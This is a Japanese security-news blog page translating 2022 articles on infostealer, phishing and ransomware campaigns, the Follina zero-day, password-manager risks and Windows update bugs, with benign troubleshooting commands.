セキュリティ情報‥


このページは、以下のサイトの和訳を中心として、セキュリティ関連のニュースを発信していくことにします。

Archive
2007まで
2008年
2009年
2010年
2011年
2012年
2013年
2014年
2015年
2016年

    セキュリティ・メーカー関連
  • ・ Emsisoft : Blog
  • ・ ESET WeLiveSecurity
  • ・ Kaspersky SecureList
  • ・ Websense Security Labs
  • ・ McAfee Blog Central
  • ・ Sophos Naked Secuirty
  • ・ Bitdefender : HOTforSecuirty
  • マスメディア
  • ・ BBC
  • ・ The Washington Post
  • ・ The Gurdian
  • ・ The Register
  • 情報サイト等
  • ・ Graham Cluley
  • ・ Krebs on Security
  • ・ The PC Informant
  • ・ BleepingComputer

【訳者より】 諸般の事情から長らくお休みしていましたが、少しづつになると思いますが始めていきます(2020/10/20)


毒性化されたCCleanerの検索結果は情報窃取マルウェアを拡散する
BleepingComputer : News>Security(2022/06/08)
 パスワード、クレジットカード、仮想通貨ウォレットを盗むマルウェアは、検索結果をWindows最適化プログラムCCleaner Proの海賊版コピーに振り向けることで促進されている。
 この新しいマルウェア拡散キャンペーンは、“FakeCrack”と称され、Avastのアナリストによって発見された。彼らは、顧客の遠隔測定データから平均10,000感染/日の企てを検出しているとレポートしている。この犠牲者の殆どは、フランス、ブラジル、インドネシア、インドである。
 このキャンペーンで拡散されているマルウェアは、個人データ、仮想通貨資産を取得する強力な情報窃取マルウェアであり、インターネット トラフィックをデータ窃取用のプロクシに送る。

Black Hat SEOキャンペーン

 この脅威のアクターは、Googleの検索結果で彼らのマルウェア配布サイトが上位にランクされるようにするためにBlack Hat SEOテクニックに従っている。そのため、多くの人々が毒物が混入された実行ファイルをダウンロードするように欺かれている。
 Avastによって発見されたこの誘惑は、Windowsのシステムクリーナであり、依然として多くのユーザが「持っておくべき」ユーティリティとして考えられているパフォーマンス最適化ツールであるCCleaner Professionalのクラックされたバージョンで発見された。


悪意あるサイトを指し示すGoogle検索結果(画像をクリックすると拡大表示されます)

 このキャンペーンで悪用されている他のソフトウェアとしては、"cracked", "serial key", "product activator", "free download"のキーワードで宣伝されているMicrosoft OfficeとMovavi Video Editorがある。
 この毒性化された検索結果は、ZIPファイルのダウンロードを提供しているランディングページ(【訳注】検索結果や広告などを経由して訪問者が最初にアクセスするページ(DS Magazineより))を表示する幾つかのWebサイトに犠牲者を導く。このランディングページは一般的にfilesend.jp や mediafire.comのような正当なファイル ホスティング プラットフォーム上にホストされている。


マルウェア配布ポータル(画像をクリックすると拡大表示されます)


 このZIPは、“1234”のような脆弱なPINを使用してパスワード保護をしている。これは単に、アンチウィルス検出からペイロードを保護するために存在している。
 このアーカイブ中のファイルは、通常“setup.exe”あるいは“cracksetup.exe”と名付けられているが、Avastは、8つの異なる実行ファイルがこのキャンペーンで使用されていることを確認している。

危険な情報窃取マルウェア

 このマルウェアは、Webブラウザに格納されている情報(アカウント パスワード、保存されているクレジットカード、仮想通貨ウォレット認証のような)を窃取するために犠牲者を欺きインストールさせようとする。
 更に、ウォレット アドレスがコピーされていないかクリップボードを監視し、それらをマルウェア オペレーターの制御下にあるアドレスに置き換えて支払いを迂回させる。 このクリップボードハイジャック機能は、Bitcoin, Ethereum, Cardano, Terra, Nano, Ronin, Bitcoin Cashアドレスなど、様々な仮想通貨アドレスで機能する。


クリップボード監視スクリプト(画像をクリックすると拡大表示されます)


 このマルウェアはまた、犠牲者が検出したり認識したりすることがほぼ出来ない中間者攻撃(【訳注】通信者同士の間に第三者が勝手に割り込むタイプの攻撃(日経クロステックより))を使用して仮想通貨マーケットアカウント認証を盗むためにプロクシを使用している。
 「攻撃者は、IPアドレスを設定し悪意あるProxy Auto-Configurationスクリプト(PAC)をダウンロードすることができる」と、「このIPアドレスをシステムに設定することによって、犠牲者がリストされているドメインの何れかにアクセスするたびに、このトラフィックは攻撃者の制御下にあるプロクシサーバにリダイレクトされる」と、Avastはそのレポートで説明している。
 このプロクシのメカニズムは、新しいレジストリキー “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings”を追加する。
 犠牲者は、Windows Settings(Windows設定)のNetwork & internet(ネットワークとインターネット)に移動し、“Use a proxy server”(プロクシサーバを使用)オプションをOFFにすることで、これを無効化することができる。
 このキャンペーンは既に広範に拡散しており、感染レートは「高」なので、あらゆる場所からクラックされたソフトウェアをダウンロードしないようにしなさい。たとえGoogle検索で上位にランクされているダウンロードサイトであろうとも。


Windows MSDT 0-Dayの脆弱性用のフリーで非公式のパッチがリリースされた
BleepingComputer : News>Security(2022/06/01)
 'Follina'として知られる緊急の0-Dayの脆弱性を標的にWindowsシステムへの攻撃をブロックするフリーで非公式のパッチが利用可能になっている。
 CVE-2022-30190として追跡され、Microsoft Windows Support Diagnostic Tool (MSDT)リモートコード実行のフローとしてMicrosoftによって説明されるこのバグは、セキュリティアップデートを受け取るまで全てのWindowsのバージョン(Windows 7+、Server 2008+)に影響を与える。
 この0-Dayを成功裏に攻撃できた攻撃者は、呼び出し元アプリケーションの権限で任意のコードを実行することができ、プログラムをインストール、閲覧、変更、データの削除や、ユーザ権限で可能な新しいWindowsアカウントを作成することができる。
 Microsoftは、この激しく悪用されている0-Dayを解決するためのセキュリティアップデートをリリースしていないが、悪意ある攻撃者が脆弱性のあるシステムでコードを実行するために使用するMSDT URLプロトコルを無効化することで攻撃をブロックする緩和策をMicrosoftは公開している。
 悪意あるドキュメントを表示しているときに悪用可能な追加の攻撃ベクトルを削除するためにWindows ExplorerのプレビューペインをOFFに切り替えることが推奨される。

公式の修正が利用可能になるまでシステムを安全にするには

 Follinaセキュリティバグの影響を受ける以下に示す一部のWindowsバージョン用のフリー(非公式)マイクロパッチが、0patchマイクロパッチサービスに出現した。

  • ・ Windows 11 v21H2
    ・ Windows 10 (v1803 ~ v21H2)
    ・ Windows 7
    ・ Windows Server 2008 R2
  •  MSDT URLプロトコル ハンドラを無効にする(Microsoftの推奨方法)代わりに、0patchは、ユーザー提供のパス(現在Windowsスクリプト中に見つからない)のサニタイゼーション(【訳注】Webアプリケーションにおけるセキュリティ対策の1つ。SNSや掲示板から投稿された文字列に含まれる有害な文字・文字列を検知して無害化すること(ITトレンドより))することで、全てのアプリケーションに関してOS全体でWindows診断ウィザードを操作不能にすることを回避している。
     「インストールされているOfficeのバージョンは重要なことではない、また、Officeがインストールされている場合には、他の攻撃ベクトルを介して、この脆弱性は悪用される可能性がある」と、「それ故、我々はms-msdt: URLハンドラが全く登録されていないWindows 7もパッチした」と、0patchの共同創設者Mitja Kolsekは発言している。
     このマイクロパッチをWindowsシステムに配備するには(Microsoftの公式のパッチがリリースされるまで)、0patchにアカウントを登録し、0patchエージェントをインストールしなければならない。
     このエージェントを起動すると、ローカルセキュリティポリシーが、このエージェントを妨げない限り、このパッチは自動的にダウンロードされ適用される。

    進行中の攻撃で悪用されている

     月曜日、企業向けセキュリティ企業Proofpointは、中国に関連しているTA413ハッキンググループが、彼らのお気に入りのターゲット(チベット人ディアスポラ反対派、【訳注】チベット人ディアスポラとは. 難民は故郷たる常居所から国境を越え、他国へと流入した者のことを指すが、亡命チベット人の場合、一九五九年以降帰るべき「チベット」はもはや存在せず、現在そこは中国領になっている。父祖の地を離れ、世界に離散している状態をディアスポラという(「北米のチベット人ディアスポラ」名古屋市立大学大学院人間文化研究科 榎木美樹より))への攻撃に現在この脆弱性を悪用している。
     セキュリティ研究者MalwareHunterTeamもまた、http://coolrat[.]xyzを介してパスワード窃取トロイを配備するために広く使用されている中国語のファイル名のドキュメントにスポットを当てている
     しかしながら、一月以上前、最初のCVE-2022-30190攻撃は、セクストーション脅威(【訳注】性的脅迫、インターネット上で「出会った」異性に対して性的行為の写真や動画を撮らせ、その公開を材料に脅迫を行う手口(Trend Microより))とSputnik Radioインタビューへの招待を餌として使用していた。これは、このフローが他の脅威のアクターによって悪用されていることを示している。
     CISAはまた、Microsoftがオンライン上でこの脆弱性が積極的に悪用されていることを報告した後、Windows管理者とユーザーにMSDTプロトコルを無効にするように促した
     4月に、この0-Dayを通知したセキュリティ研究者Shadow Chaser GroupのCrazymanArmyは、Microsoftは「セキュリティに関連する問題」ではないとして、彼の具申を拒否したと発言している。しかしながら、Microsoftは後で、リモートコード実行の影響があるとして、この脆弱性具申レポートに応じている。


    パスワードマネージャが思われているほど安全とは言えない8つの理由
    MUO : Security(2022/05/25)
     パスワードマネージャを使用すれば安全なのか? パスワードマネージャには多くの利点があるが、それらは、それらの問題を依然として持っている。以下が、認識する必要のあることである。
     パスワードマネージャは、パスワードを保持するために推奨されるオプションである。パスワードマネージャは、使用しているあらゆるサービス用の強固で一意のパスワードを格納することを可能にしている。パスワードマネージャはまた、毎回パスワードをタイプすることなくログインすることが可能なので、キーロガーからあなたを保護する。
     しかしながら、パスワードマネージャは完全ではない。また、全ての人が単一の場所に彼らのパスワードの全てを格納するという考えを好んでいるわけではない。パスワードマネージャを使用しセキュリティ侵害された場合、ハッカーは、あなたの全てのアカウントへのアクセスを取得する可能性がある。
     では、パスワードマネージャは、どれほど安全なのか? どれかのパスワードマネージャを使用する必要はあるのだろうか?

    パスワードマネージャを安全とする4つの理由

     パスワードマネージャは広く推奨されている。以下にパスワードマネージャを使用する幾つかの利点を示す。
    1. 256-bit AES
     全てのパスワードマネージャは256-bit Advanced Encryption Standards(【訳注】高度暗号化標準、アメリカが2001年に標準暗号として定めた共通鍵暗号アルゴリズム(Wikipediaより))を使用している。これは、あなたが提供したあらゆる情報を暗号化するために使用され、クラックできないと考えられている。これは、あなたのパスワードマネージャがハッキングされたとしても、あなたのパスワードの全ては依然として入手され難い。

    2. ゼロトラスト(Zero Trust)
     全てのパスワードマネージャはゼロトラストを使用する。これは、あなたのマスターパスワードがあなたのデバイスを離れる前に暗号化されることを意味している(【訳注】PCやスマホ上で暗号化された後に送信される)。このため、パスワードマネージャを運営している企業のスタッフでさえアクセスすることはできない。

    3. 二要素認証
     殆どのパスワードマネージャは、二要素認証を使用することを可能にしている。これは追加の防御ラインの提供である。これは、二要素認証デバイスにアクセスできない限り、いかなる者もあなたのパスワードマネージャにアクセスできないようにする。これは、ハッカーがどうにかしてあなたのパスワードを解析した場合でも、依然としてそれを使用して、あなたのアカウントにアクセスできないことを意味している。

    4. 優れた代替案
     パスワードマネージャは、あなたがパスワードを覚えておく必要がないので強固なパスワードを使用することを可能にしている。また、全てのアカウントに対して異なるパスワードを使用するように奨励している。全てのパスワードを一つの場所に保持することは理想的ではない。しかし、脆弱なパスワードの使用をしなくて済むのであれば、実行する価値のある妥協である。

    パスワードマネージャが思われているほど安全ではない8つの理由

       パスワードマネージャは人気があるが、欠陥がないわけではない。適切に使用されていない場合は、あなたのアカウントは安全性が実際に悪くなる。パスワードマネージャの使用に関連する幾つかのリスクについて述べる。

    1. 全ての物が一つの場所に
     パスワードマネージャは、情報の全てを一つの場所に格納するよう促す。これはしばしば、パスワードだけでなく支払い情報の詳細も含んでいる。パスワードマネージャは、非認証アクセスを防御するように設計されているが、理想的ではない。パスワードマネージャは、ハッキングされる可能性を減少するが、あなたがハッキングされたなら、ダメージの可能性は増大する。

    2. キーロガーはより危険な存在になる
     パスワードマネージャは、多くの場合あなたをキーロガーから保護する。パスワードマネージャは、自動入力を使用してアカウントにログインすることを可能にしているので、キーロガーは役に立たない。しかし、あなたがパスワードマネージャにパスワードを入力している時はどうだろうか?
     このシナリオではキーロガーは有用であり、あなたのアカウントへの一つへのアクセスを取得するというより、ハッカーは全てのパスワードへのアクセスを取得することが可能になるだろう。パスワードマネージャの一つを使用するのであれば、マルウェアに汚染されているコンピュータの使用を回避する必要がある。

    3. 簡単なアカウントへのアクセス
     個人のデバイスでパスワードマネージャにログインしたままにしている人々がよく見られる。これは便利であるが、誰かがそのデバイスにアクセスすると、その人達はパスワードと支払い情報の詳細の全てにアクセスできることを意味している。これは、あなたがパスワードマネージャを使用したい時だけパスワードマネージャにログインすることによって軽減される。しかし、これは間違いなくソフトウェアの有用性を低下させる。

    4. 一部の機能は有料バージョンだけ
     パスワードマネージャは、大抵有用な追加機能を持っている。例えば、ある追加機能は、あなたのパスワードがダークWeb上にリークされているか否かを告げてくれる。他には、あなたのパスワードを評価し、それが如何に安全かを告げてくれるものもある。これらの機能の問題点は、あなたが特別料金を支払った場合にのみ利用可能になっていることである。無料のパスワードマネージャを使用しているのであれば、あなたは可能な限りの最高の防御を得ることができていない。

    5. バックアップは常時利用されているわけではない
     殆どのパスワードマネージャは、あなたのパスワード金庫をバックアップすることを可能にしている。しかし、誰もがこの機能を使用しているわけではない。パスワードマネージャがあなたのパスワードの唯一のコピーであるのなら、あなたがそのパスワードを忘れたり、サーバーがダウンしたりすると、あなたは全アカウントへのアクセスを失う。これは定期的にパスワードをバックアップし、そのバックアップを何処か安全な場所に保持することによって回避することができる。

    6. パスワードマネージャはハッキングされる
     パスワードマネージャは安全な製品であるが、それはパスワードマネージャを所有する企業がハッキングされないということを意味してはいない。実際、パスワードマネージャにはハッキングされた歴史がある。LastPassは2015年にハッキングされ、OneLoginは2017年にハッキングされている。いずれの場合も、顧客のパスワードが晒されることはなかったが、これは、パスワードマネージャを所有する企業がハッカーをシャットアウトできないことを示している。

    7. 二要素認証はオプションになっている
     二要素認証はパスワードマネージャのオプショナル機能である。二要素認証を使用していないのであれば、あなたのパスワードは安全ではない。ハッカーが、あなたのマスターパスワードをなんとか解析した場合、あなたのパスワード金庫へのアクセスを停止する手段はない。これは、過去に様々な場所で同じパスワードを使用していた場合、あなたがフィッシング詐欺に引っかかった場合、あるいはコンピュータにキーロガーが存在していた場合に発生していたことである。

    8. パスワードを忘れる可能性
     全てのパスワードマネージャは同じ弱点を持っている。マスターパスワードを失うと、あなたは全てのパスワードへのアクセスができなくなる。この問題は、バックアップを保持し、マスターパスワードを安全な場所に格納することによって軽減することができるが、一つの場所にパスワードの全てを格納する危険性を浮き立たせることになる。

    パスワードマネージャは安全なのか?

     パスワードマネージャには固有の欠陥があるものの、ほとんどの人々はパスワードマネージャを使用することで便益を得るだろう。パスワードマネージャは、覚え難い複雑で一意のパスワードを設定することを可能にする。
     これらの製品を避けるのではなく、欠陥を理解した上で、それに応じて使用する必要がある。
     パスワードマネージャーは、キーロガーに対する完全な保護を提供していない。また、パスワードマネージャをパスワードの唯一のコピーとして使用してはならない。パスワードリストは定期的にバックアップし、マスターパスワードのコピーは安全な場所に格納する必要がある。


    Windows 11 KB5014019はTrend Microの身代金要求型マルウェア防御を破壊する
    BleepingComputer : News>Security(2022/05/26)
     今週のWindowsオプションの累積アップデートプレビューは、Trend Microのセキュリティ製品の一部で互換性の問題(身代金要求型マルウェア防御機能を含む一部の互換性を破壊)を発生させている。
     「Trend Microの幾つかの末端機器及びサーバ保護製品によって使用されているUMHコンポーネントは、身代金要求型マルウェア防御のような幾つかの高度な機能を担っている」と、このアンチウィルス企業は明らかにしている
     「Trend Microは、Microsoft Windows 11及びWindows 2022のオプショナル プレビューパッチ(KB5014019)を適用し再起動するとTrend Micro UMHドライバが停止する潜在的な問題を認識している。 」
     この既知の問題は、Apex One 2019, Worry-Free Business Security Advanced 10.0, Apex One as a Service 2019, Deep Security 20.0, Deep Security 12.0, Worry-Free Business Security Services 6.7を含む幾つかのTrend Micro末端機器用に使用されているUser Mode Hooking (UMH) コンポーネントに影響を与える。
     この日本のサイバーセキュリティ企業は、2022年6月の定例パッチの一部として、このアップデートプレビューが全てのWindowsユーザに押し付けられる前に、現在この問題の解決に取り組んでいる。

    Trend Microの末端機器用ソフトの機能を復元する方法

     幸いにも、通常の定例Windowsアップデートと異なり、今週のプレビューアップデートはオプションである。プレビューアップデートは、一般にリリースする前にバグの修正とパフォーマンスの改善をテストするために発行される。
     Windowsユーザは、設定 > Windows Updateからオプショナル アップデートを手動に変更する必要がある。これで、「今すぐダウンロード」ボタンをクリックするまでオプショナルアップデートはインストールされないので、影響を受ける可能性のあるユーザの数が制限される。
     影響を受けるWindowsプラットフォームは、Windows 11, Windows 10 version 1809, Windows Server 2022を稼働しているシステムであり、クライアントとサーバの両方を含んでいる。
     このWindowsのオプショナル パッチをインストールしてしまったTrend Microの顧客は、このパッチを一時的にアンインストールするか、Trend Microのサポートに連絡し、彼らのセキュリティソフトの機能を回復するUMHデバッグモジュールを取得しなさい。
     Windowsユーザは、管理者権限のコマンドプロンプトから以下のコマンドを使用して、このプレビューアップデートを削除することができる。

    Windows 10 1809: wusa /uninstall /kb:5014022
    Windows 11: wusa /uninstall /kb:5014019
    Windows Server 2022: wusa /uninstall /kb:5014021


    フィッシングWebサイトは今、あなたの認証を盗むためにチャットボットを使用している
    BleepingComputer : News>Security(2022/05/19)
     フィッシング攻撃は今、自動化されたチャットボットを使用して訪問者のログイン情報を脅威のアクターに手渡すようにガイドしている。
     このアプローチは攻撃者のためにプロセスを自動化しており、チャットボットが一般的に正当なブランドのWebサイトに見られることから、悪意あるサイトを訪問した者に正当なサイトであるという感覚を与えている。
     この新しいフィッシング攻撃の開発は、Trustwaveの研究陣によって発見され、このレポートの公開前にBleeping Computerと共有された。

    これはE-Mailで始まる

     このフィッシングプロセスは、DHL(【訳注】航空機を主体とした国際宅配便、運輸、ロジスティクスサービスを扱うドイツの国際輸送物流会社(DHLより))配送ブランドを装い小包の配達に関する情報を含んでいると主張するE-Mailで始まる。


    フィッシング E-Mailのサンプル(画像をクリックすると拡大表示されます)

     E-Mail中の'Please follow our instructions'をクリックすると、フィッシングサイトへのリンクを含むPDFファイルがロードされる。脅威のアクターがPDFドキュメント中にフィッシングリンクを表示させるのは、E-Mailセキュリティソフトウェアをバイパスするためである。


    悪意あるリンクを含むダウンロード可能なPDF(画像をクリックすると拡大表示されます)               

     しかしながら、このPDF中のURLボタン(URLリンク)は、未配達の小包に発生している問題を解決すると装うフィッシングサイト(dhiparcel-management[.]support-livechat[.]24mhd[.]com)に犠牲者を連れて行く。
     ここでチャットボットに引き継がれる。

    チャットボットは、あなたの認証情報を盗む

     フィッシングページがロードされると、訪問者は一般的に認証情報を盗むために使用されるインチキのログインフォームの代わりに、その小包が配達されない理由を説明するWebチャットに出迎えられる。
     このWebチャットは、配達できないのは小包のラベルが破損しているからであると説明する。このWebチャットは、このスカムの正当性を更に追加するために、申したてられている小包の写真も表示する。


    フィッシングサイトのチャットボット(画像をクリックすると拡大表示されます)               

     このバーチャル アシスタントは、訪問者に予め定められた対応を行うので、会話は固定されており、常に申し立てられている小包の破損したラベルの写真を表示するようになっている。
     この問題のために、このチャットボットは、犠牲者に住所や勤務先の住所、姓名、電話番号等のような詳細な個人情報を与えるように要求してくる。
     その後、この配達はスケジュールされたことになり、このフィッシングページがより正当なものであるかのように振る舞うために、偽のCAPTCHAステップが表示される。
     次に、犠牲者は、DHLアカウント認証情報の入力を要求するフィッシングページにリダイレクトされる。最後に、おそらく配送コストを贖うための支払いのステップに導かれる。
     最後の"Secure Pay"ページは、カード所有者名、カード番号、有効期限、セキュリティコードを含む典型的なクレジットカード決済フィールドを含んでいる。


    クレッジットカード支払いフィールド(画像をクリックすると拡大表示されます)               

     個人情報の詳細が入力され、"Pay Now"ボタンがクリックされると、犠牲者は提供したスマートフォンにワンタイム パスワード(OTP)をSMSを介して受け取る。これは正当性の感覚を追加する。


    ワンタイム パスワード検証画面(画像をクリックすると拡大表示されます)               

     Trustwaveのアナリストはランダムな文字列を入力してテストした。このシステムは不正なセキュリティコードとするエラーを戻してきた。OTP検証の実装は本物である。
     正しいコードが入力されると、このインチキのページは"Thank you!"メッセージを表示し、提出が受け付けられたことを確認する。

    キャンペーンは「本物」になりつつある

    脅威のアクターは、CAPTCHA、OTPs、チャットボットのような一般的に本物のWebサイトで発見されるメカニズムの使用を増加させているので、犠牲者は情報窃取の企てに気がつくことが困難になってきている。
     これは、即座のアクションを要求する一方的な通信を受信したとき、特にメッセージ中にボタンやURLリンクが埋め込まれている場合には、警戒を強化する必要がある。
     DHLや他の配送サービスが、あなたに何らかの対応を要求している場合、提供されているリンクをクリックするのではなく、必ずブラウザの新しいタブで実際のWebサイトを開きなさい。
     次に、その間違いのないプラットフォームであなたのアカウントにログインしなさい。そして、全ての保留中のアイテムや警告をチェックしなさい。あるいは、顧客サポートに自分自身でコンタクトしなさい。
     いつもどおり、フィッシングページを発見する最高の方法は、そのWebサイトのURLを検証することである。それが疑わしく見えたり、あるいは正当なドメインに一致しない場合は、そのページにいかなる個人情報も入力してはならない。
     この場合、成り済ましているDHLのURLは、"24mhd.com"ドメインで終わっている。これは明らかにDHLのWebサイトではない。そして、フィッシングの企ての明らかな兆候である。


    Windows 11のKB5013943アップデートは0xc0000135アプリケーションエラーを発生させる
    BleepingComputer : News>Security(2022/05/11)
     Windows 11のユーザは、最近のWindows 11 KB5013943累積アップデートをインストールした後にアプリケーションの起動を試みた時、0xc0000135エラーを表示されている。
     昨日、Microsoftは、新しいWindows 11累積アップデートをリリースした。これは、セキュリティの脆弱性と2022年05月の定例パッチの一部のバグを修正するものである。
     これらのアップデートには、Windows 11 KB5013943アップデートが含まれている。このアップデートは、.NET Framework 3.5アプリケーションが、Windows Communication Foundation (WCF)とWindows Workflow (WWF)コンポーネントを使用している場合には、それらのアプリケーションが起動しない問題を発生させるバグの修正を含んでいた。

    KB5013943アップデートは .NET アプリケーションを破壊する

     しかしながら、Microsoftの修正は、さらなる問題を発生させたかのようである。現在、Windows 11のユーザは、KB5013943アップデートをインストールした後、もはや起動しなくなった広範な種類のアプリケーションを報告している[1, 2, 3, 4, 5]。
     影響を受けるアプリケーションはユーザにより様々であるが、報告されている問題あるアプリケーションの一部には、ProtonVPN, PowerShell, Event Viewer, Sound Blaster Command, KeePass, Visual Studio, Discord, ShareX等が含まれる。
     このアプリケーションを開こうとすると、Windows 11は、以下に示す「"The application was unable to start correctly (0xc0000135、【訳注】アプリケーションを正しく初期化できませんでした). Click OK to close the application."というエラーを表示する。」


    アプリケーション起動時に表示されるWindows 11 0xc0000135エラー(画像をクリックすると拡大表示されます)

     「私のラップトップを最新のWindows 11のバージョンにアップデートしただけなのに、多くのアプリケーションエラーと複数のアプリケーションの自動起動エラーが表示されるようになった。エラー0xc0000135を修正する方法はありますか?」これはMicrosoft Answer Forumへのユーザの投稿である。
     「KB5013628 / KB5013943の後にエラーが発生している人はいますか ー このアプリケーションは正しく初期化できなかった(0xc0000135)、あらゆる.NET 4.8プログラムは初期化できない ー bing/visual studio等」と、他のユーザがTwitterで説明している
     0xc0000135エラーは、プログラムが正しく操作するために要求するDLLファイルの発見に失敗したことを示しているので、このプログラムは起動しない。この特定の問題では、アプリケーションが.NET DLLsを探し、それを発見できなかったようである。
     Windows 11 KB5013943アップデートをアンインストールすると、この問題は解決するが、そのデバイスは新しくパッチされた脆弱性に対して無防備なまま放置される。
     Windows 11のユーザは、NET 3.5を有効にするか再インストールすることで、この問題が修正されることを発見した。
     これを実行するには、コントロールパネル > プログラム > Windows機能の有効化または無効化 に進み、必ず、.NET Framework 3.5 (includes .NET 2.0 and 3.0) 及び Net Framework 4.8 Advanced Servicesをチェックしなさい。以下の画像参照。


    コントロールパネルのWindows機能の有効化または無効化(画像をクリックすると拡大表示されます)

     代替方法としては、Windows 11の管理者権限でのコマンドプロンプト(管理者としてcmd.exeを実行)を起動し、以下のコマンドを実行して、この機能を有効にする。

    dism /online /enable-feature /featurename:netfx3 /all
    dism /online /enable-feature /featurename:WCF-HTTP-Activation
    dism /online /enable-feature /featurename:WCF-NonHTTP-Activation

     これが動作しない場合は、コントロールパネルから .NET 機能をアンインストールし、次に、それらを再インストールして、修復プロセスを実行しなさい。
     最後に、他の全てのことも失敗したなら、KB5013943アップデートをアンインストールしなさい。しかしながら、この操作は、最新のセキュリティの驚異からデバイスを無防備にしたままにするので強く反対する。


    インチキのWindows 10アップデートはMagniber身代金要求型マルウェアに感染させる
    BleepingComputer : News>Security(2022/04/30)
     今月始めに始まった巨大なキャンペーンであるインチキのWindows 10アップデートは、Magniber身代金要求型マルウェアを拡散するために使用されていた。
     ここ数日に渡り、BleepingComputerは、世界中のユーザをターゲットにした身代金要求型マルウェア感染に関する多くの支援要請を受け取った。
     このキャンペーンを解析中に、我々はWindows 10累積アップデートもしくはセキュリティアップデートであると信じてインストールした後、Magniber身代金要求型マルウェアに感染したとする読者の報告を我々のフォーラム トピックに発見した。
     これらのアップデートは、最も一般的であるWin10.0_System_Upgrade_Software.msi [VirusTotal] 、 Security_Upgrade_Software_Win10.0.msiのような名前で配布されている。
     以下に見られるように、他のダウンロードはインチキのknowledge baseを使用してWindows 10累積アップデートを装っている。

    ・ System.Upgrade.Win10.0-KB47287134.msi
    ・ System.Upgrade.Win10.0-KB82260712.msi
    ・ System.Upgrade.Win10.0-KB18062410.msi
    ・ System.Upgrade.Win10.0-KB66846525.msi

     VirusTotalへの提出によると、このキャンペーンは、2022年04月08日に開始されたようであり、それ以来、世界中に大拡散しているようである。
     インチキのWindows 10アップデートが促進されている方法は100%明らかになっているわけではないが、このダウンロードは、偽のWarez and Crack(【訳注】インターネットなどを用いて非合法的に配布・販売されている商用ソフトウェアとクラックツールを配布しているサイト)サイトから配布されている。


    Magniberを押し付けてくる偽のWarez and Crackサイト(画像をクリックすると拡大表示されます)

     一旦インストールされると、この身代金要求型マルウェアは、シャドーボリュームコピーを削除し、次にファイルを暗号化する。ファイルを暗号化している時、この身代金要求型マルウェアは、以下に示したように、.gtearevfのようなランダムな8文字の拡張子を追加する。


    Magniberで暗号化されたファイル(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアはまた、各フォルダ内に身代金支払い用のMagniber Tor支払いサイトへのアクセス方法への指示を含むREADME.htmlと名付けられた脅迫文を作成する。


    Magniber脅迫文(画像をクリックすると拡大表示されます)

     Magniber支払いサイトは'My Decryptor'と題されており、犠牲者に無料で一つのファイルを復号することや、サポートへのコンタクトを可能にしており、犠牲者が支払いを実行するための身代金額とBitcoinアドレスを定めている。


    Magniber支払いサイト(画像をクリックすると拡大表示されます)

     BleepingComputerが支払いページを確認したところによると、ほとんどの身代金の要求金額は、およそ2,500 USD(324,858円、1$=129.94円換算)もしくは0.068 Bitcoinであった。
     Magniberは安全であると見なされる。つまり、ファイルを無料で回復するために悪用される可能性のある弱点は含まれていないことを意味している。
     残念ながら、このキャンペーンは、企業ではなく主に学生と消費者をターゲットにしているため、身代金の要求額は多くの被害者にとってあまりに高額である。


    注意: Onyx身代金要求型マルウェアはファイルを暗号化する代わりに破壊している
    BleepingComputer : News>Security(2022/04/27)
     新しいOnyx身代金要求型マルウェアは、2MBより大きなファイルは暗号化するのではなく破壊しているので、身代金を支払ったとしても、これらのファイルが復号されることはない。
     先週、セキュリティ研究者MalwareHunterTeamは、Onyxと呼ばれる新しい身代金要求型マルウェアが稼働していたことを発見した
     今日の殆どの身代金要求型マルウェアのように、Onyxの脅威のアクターは、デバイスを暗号化する前にネットワークからデータを盗む。このデータは、身代金が支払われなければ、このデータを公開すると脅す二重の脅迫(Double-Extortion)に使用される。


    Onyx身代金要求型マルウェアのデータリーク サイト(画像をクリックすると拡大表示されます)

     この身代金要求型マルウェアのギャングは、今までかなり成功しており、彼らのデータリークのページには6人の犠牲者がリストされている。

    Onyx身代金要求型マルウェアは殆どのデータを破壊する

     Onyx身代金要求型マルウェアの技術的機能面に関しては、MalwareHunterTeamが暗号化ツールのサンプルを発見した今日時点で分かっていない。
     判明していることで懸念されるのは、この身代金要求型マルウェアがファイルを暗号化する代わりにランダムなジャンク データで多くのファイルを上書きすることである。
     以下のソースコードから分かるように、Onyxは2MBより小さなファイルは暗号化する。しかしながら、MalwareHunterTeamによれば、Onyxは、2MBより大きなファイルは全てジャンク データで上書きする。


    Onyx身代金要求型マルウェアのソースコード(画像をクリックすると拡大表示されます)

     これはランダムに作成されたデータであり暗号化ではないので、2MBを超えるファイルに関しては復号する方法はない。
     犠牲者が身代金を支払ったとしても、復号ツールは2MBより小さな暗号化されたファイルだけしか復号しない。
     チェコCERTのフォレンジック(【訳注】デジタル機器から 法的証拠に関わる情報を抽出しハッキングやマルウェアなどのセキュリティを脅かす脅威の特定に活用される技術(デジタルデータ フォレンジックより))アナリストJiri Vinopalによると、この身代金要求型マルウェアは、Chaos身代金要求型マルウェアに基づいている。同じダメージを与える暗号化ルーチンを含んでいることによる。
     暗号化ルーチンにおける破壊の本質は、バグではなく作為なので、身代金を支払わないように犠牲者に強く忠告する。

    2022/04/28 Update 破壊されるのは2MBより大きなファイルであり、このマルウェアはChaos身代金要求型マルウェアの亜種である。


    アニメーションQRコード: 動作方法と作り方
    BleepingComputer : News>Security(2022/04/23)
     QRコードでより目立つものと認識されている二次元バーコード(2D)は、最近すべてのものに関して「非接触」が要求されていることもあって再流行している。
     Coinbase(米国の暗号資産取引所)も、この機会を掴むために時間を無駄にしなかった。Superbowl 2022 TV広告は、全体的にあなたの注意を惹きつける目的で真っ黒な背景にミステリアスなQRコードがあることを除いて何もなかった。
     これらの奇妙な正方形がどのように機能するのかを正しく理解できていない人々でさえ、いずれかの段階で頻繁に使用している。
     しかし、QRコードに動いたり、アニメーションしたりしているものがあるだろうか? どのように動作しているのか?

    スキャンしてみよう

     今週、科学技術者であり、"cyborg hardware hacker"であり、YouTuberであるZack Freedmanは、Repeated Failureによって作成され、バズっているGIFをツイートした。
     以下に示すこのGIFは、一部の人が認識できるかもしれない移動フレームを備えたアニメーションQRコードを含んでいる。これは、Rick Astleyの有名なNever Gonna Give You Up(ギヴ・ユー・アップ)ミュージックビデオのシーケンスである
     曲の歌詞とミュージックビデオは、netizens(【訳注】ネチズン。ネット市民)にもハッキングされた企業をトローリングしている悪意のアクターにも、長い間人気のあるミーム(【訳注】模倣によって伝えられる情報)であった。
     しかし、このGIFは、芸術化したバーコードではなく、実際にQRコードとして動作する。自分自身でスキャンしてみよう!


    動作しているアニメーションQRコード            

